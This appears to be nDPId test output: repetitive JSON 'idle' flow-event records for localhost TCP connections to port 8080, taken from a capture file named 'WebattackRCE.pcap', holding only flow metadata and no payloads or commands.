-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276968,"flow_last_seen":1576420276968,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276969,"flow_last_seen":1576420276969,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276970,"flow_last_seen":1576420276970,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276972,"flow_last_seen":1576420276972,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276973,"flow_last_seen":1576420276973,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276976,"flow_last_seen":1576420276976,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276977,"flow_last_seen":1576420276977,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276980,"flow_last_seen":1576420276980,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276998,"flow_last_seen":1576420276998,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276999,"flow_last_seen":1576420276999,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277000,"flow_last_seen":1576420277000,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 